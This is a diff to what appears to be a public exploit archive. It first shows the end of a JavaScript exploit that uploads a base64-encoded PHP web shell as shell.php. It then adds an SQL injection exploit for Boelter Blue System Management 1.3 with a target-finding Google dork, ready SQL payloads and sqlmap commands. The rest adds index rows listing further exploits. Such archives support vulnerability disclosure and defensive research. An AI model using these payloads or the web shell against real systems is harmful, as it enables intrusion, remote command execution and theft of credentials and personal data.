+        var body = "url=data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==&path=&name=shell.php";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+submitRequest();
+
+######
\ No newline at end of file
diff --git a/exploits/php/webapps/52052.txt b/exploits/php/webapps/52052.txt
new file mode 100644
index 0000000000..7251d5b373
--- /dev/null
+++ b/exploits/php/webapps/52052.txt
@@ -0,0 +1,48 @@
+# Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)
+# Google Dork: inurl:"Powered by Boelter Blue"
+# Date: 2024-06-04
+# Exploit Author: CBKB (DeadlyData, R4d1x)
+# Vendor Homepage: https://www.boelterblue.com
+# Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US
+# Version: 1.3
+# Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
+# CVE: CVE-2024-36840
+
+## Vulnerability Details:
+
+### Description:
+Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.
+
+Parameter: id (GET)
+Type: boolean-based blind
+Title: Boolean-based blind - Parameter replace (original value)
+Payload: id=10071 AND 4036=4036
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 44 columns
+Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
+
+1. **news_details.php?id** parameter:
+sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
+
+2. **services.php?section** parameter:
+sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
+
+3. **location_details.php?id** parameter:
+sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
+
+Impact:
+Unauthorized access to the database.
+Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.
+Account takeovers and potential full control of the affected application.
+
+Discoverer(s)/Credits:
+CBKB (DeadlyData, R4d1x)
+
+References:
+https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 342d20cb5c..e40b05800f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4030,6 +4030,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware,,2009-08-17,,1,OSVDB-57419,,,,,
 17244,exploits/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",remote,hardware,,2011-05-04,2011-05-04,1,,,,,,http://www.redteam-pentesting.de/advisories/rt-sa-2011-003
 24760,exploits/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",remote,hardware,,2004-11-22,2013-03-13,1,CVE-2004-1540;OSVDB-12108,,,,,https://www.securityfocus.com/bid/11723/info
+52049,exploits/hardware/remote/52049.rb,"Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit)",2024-06-14,ub3rsick,remote,hardware,,2024-06-14,2024-06-14,0,,,,,,
 50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",2022-04-19,"Ahmed Alroky",remote,hardware,,2022-04-19,2022-04-19,0,CVE-2021-4039,,,,,
 30935,exploits/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,remote,hardware,,2007-12-25,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27024/info
 43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware,,2017-11-01,2017-11-01,0,CVE-2016-10401,,,,,
@@ -12208,6 +12209,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,,2019-03-21,2019-03-21,0,CVE-2019-5418,Traversal,,,,
 46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,,2019-05-06,2019-05-06,0,CVE-2018-20580,,,,,
 48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,,2020-02-24,2020-02-24,0,,,,,,
+52051,exploits/multiple/webapps/52051.txt,"Rebar3 3.13.2 - Command Injection",2024-06-14,ub3rsick,webapps,multiple,,2024-06-14,2024-06-14,0,,,,,,
 10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple,,2009-12-13,2015-07-12,0,,,,,,
 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
@@ -13699,6 +13701,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12859,exploits/php/webapps/12859.txt,"Advneced Management For Services Sites - File Disclosure",2010-06-03,indoushka,webapps,php,,2010-06-02,,0,,,,,,
 2513,exploits/php/webapps/2513.txt,"ae2 - 'standart.inc.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php,,2006-10-09,,1,,,,,,
 2377,exploits/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,webapps,php,,2006-09-15,,1,OSVDB-28924;CVE-2006-4870;OSVDB-28923,,,,,
+52046,exploits/php/webapps/52046.txt,"AEGON LIFE v1.0 Life Insurance Management System - SQL injection vulnerability.",2024-06-14,"Aslam Anwar Mahimkar",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
+52042,exploits/php/webapps/52042.txt,"AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)",2024-06-14,"Aslam Anwar Mahimkar",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
+52045,exploits/php/webapps/52045.txt,"AEGON LIFE v1.0 Life Insurance Management System - Unauthenticated Remote Code Execution (RCE)",2024-06-14,"Aslam Anwar Mahimkar",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 1896,exploits/php/webapps/1896.txt,"aePartner 0.8.3 - 'dir[data]' Remote File Inclusion",2006-06-10,Kacper,webapps,php,,2006-06-09,2016-08-16,1,OSVDB-26332;CVE-2006-2996,,,,http://www.exploit-db.comaePartner-0.8.3.tar.gz,
 51085,exploits/php/webapps/51085.txt,"Aero CMS v0.0.1 - PHP Code Injection (auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 51083,exploits/php/webapps/51083.txt,"Aero CMS v0.0.1 - SQL Injection (no auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@@ -15125,6 +15130,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,webapps,php,,2010-01-23,,0,,,,,,
 18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,webapps,php,,2012-03-28,2012-08-13,1,OSVDB-80660,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-06-at-21926-pm.png,http://www.exploit-db.combmachine-3.1.zip,
 5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46425;CVE-2008-2846,,,,,
+52052,exploits/php/webapps/52052.txt,"Boelter Blue System Management 1.3 - SQL Injection",2024-06-14,CBKB,webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 51741,exploits/php/webapps/51741.py,"BoidCMS v2.0.0 - authenticated file upload vulnerability",2023-10-09,1337kid,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-38836,,,,,
 30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38668,,,,,https://www.securityfocus.com/bid/25644/info
 30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38669,,,,,https://www.securityfocus.com/bid/25644/info
@@ -15487,6 +15493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
 41595,exploits/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",webapps,php,,2017-03-13,2017-03-13,0,,,,,,
 26878,exploits/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4381;OSVDB-21834,,,,,https://www.securityfocus.com/bid/15939/info
+52043,exploits/php/webapps/52043.txt,"Carbon Forum 5.9.0 - Stored XSS",2024-06-14,"Chokri Hammedi",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,,2018-10-29,2018-10-29,0,,,,,http://www.exploit-db.comtubigangarden.zip,
 36144,exploits/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,webapps,php,,2011-09-19,2015-02-22,1,,,,,,https://www.securityfocus.com/bid/49677/info
 12690,exploits/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,webapps,php,,2010-05-20,,0,,,,,http://www.exploit-db.comcardinalCms1.2.zip,
@@ -26086,6 +26093,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,,2020-07-09,2020-07-09,0,,,,,,http://blog.huntergregal.com/2020/07/from-web-to-pwn-ffi-arbitrary-readwrite.html
 49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",2021-06-03,flast101,webapps,php,,2021-06-03,2021-06-03,1,,,,,,
 35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,,2014-11-17,2020-02-14,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;OSVDB-112004;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659,,,http://www.exploit-db.com/screenshots/misc/auxxrjf.png,,
+52047,exploits/php/webapps/52047.py,"PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)",2024-06-14,"Yesith Alvarez",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 38435,exploits/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php?q' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php,,2013-04-05,2015-10-09,1,CVE-2013-0135;OSVDB-92096,,,,,https://www.securityfocus.com/bid/58911/info
 38434,exploits/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php,,2013-04-05,2015-10-09,1,CVE-2013-0135;OSVDB-92097,,,,,https://www.securityfocus.com/bid/58911/info
 38425,exploits/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php,,2013-04-05,2015-10-09,1,CVE-2013-0135;OSVDB-92106,,,,,https://www.securityfocus.com/bid/58911/info
@@ -34190,6 +34198,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
+52048,exploits/php/webapps/52048.txt,"WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)",2024-06-14,"Onur Göğebakan",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 51717,exploits/php/webapps/51717.py,"Wp2Fac - OS Command Injection",2023-09-08,"Ahmet Ümit BAYRAM",webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
@@ -34358,6 +34367,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33656,exploits/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",webapps,php,,2010-02-18,2014-06-07,1,CVE-2010-1078;OSVDB-63201,,,,,https://www.securityfocus.com/bid/38309/info
 5293,exploits/php/webapps/5293.pl,"XLPortal 2.2.4 - 'Search' SQL Injection",2008-03-21,cOndemned,webapps,php,,2008-03-20,,1,OSVDB-43707;CVE-2008-1509,,,,,
 15251,exploits/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection",2010-10-14,Sky4,webapps,php,,2010-10-14,2010-10-16,1,OSVDB-68642,,,,,
+52044,exploits/php/webapps/52044.txt,"XMB 1.9.12.06 - Stored XSS",2024-06-14,"Chokri Hammedi",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 2105,exploits/php/webapps/2105.php,"XMB 1.9.6 - 'mq=off' 'u2uid' SQL Injection",2006-08-01,rgod,webapps,php,,2006-07-31,,1,OSVDB-27720;CVE-2006-3994,,,,,
 2178,exploits/php/webapps/2178.php,"XMB 1.9.6 Final - 'basename()' Remote Command Execution",2006-08-13,rgod,webapps,php,,2006-08-12,,1,OSVDB-29344;CVE-2006-4191,,,,,
 21447,exploits/php/webapps/21447.txt,"XMB Forum 1.6 - Magic Lantern Cross-Site Scripting",2002-05-11,frog,webapps,php,,2002-05-11,2012-09-22,1,OSVDB-86918,,,,,https://www.securityfocus.com/bid/4721/info
@@ -34911,6 +34921,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46420,exploits/php/webapps/46420.txt,"Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting",2019-02-19,"Deyaa Muhammad",webapps,php,80,2019-02-19,2019-02-19,0,,"Cross-Site Scripting (XSS)",,,,
 28842,exploits/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,webapps,php,,2006-10-23,2013-10-10,1,CVE-2006-5512;OSVDB-30007,,,,,https://www.securityfocus.com/bid/20682/info
 15945,exploits/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",webapps,php,,2011-01-08,2011-01-08,0,OSVDB-70395;CVE-2011-0505,,,,http://www.exploit-db.comzwii_5147.zip,
+52050,exploits/php/webapps/52050.txt,"ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)",2024-06-14,ub3rsick,webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,php,,2004-11-24,2013-03-14,1,CVE-2004-1075;OSVDB-12116,,,,,https://www.securityfocus.com/bid/11745/info
 12454,exploits/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,webapps,php,,2010-04-28,,1,,,,,,
 12262,exploits/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",webapps,php,,2010-04-15,,0,,,,,http://www.exploit-db.comZykeCMSV1.0.zip,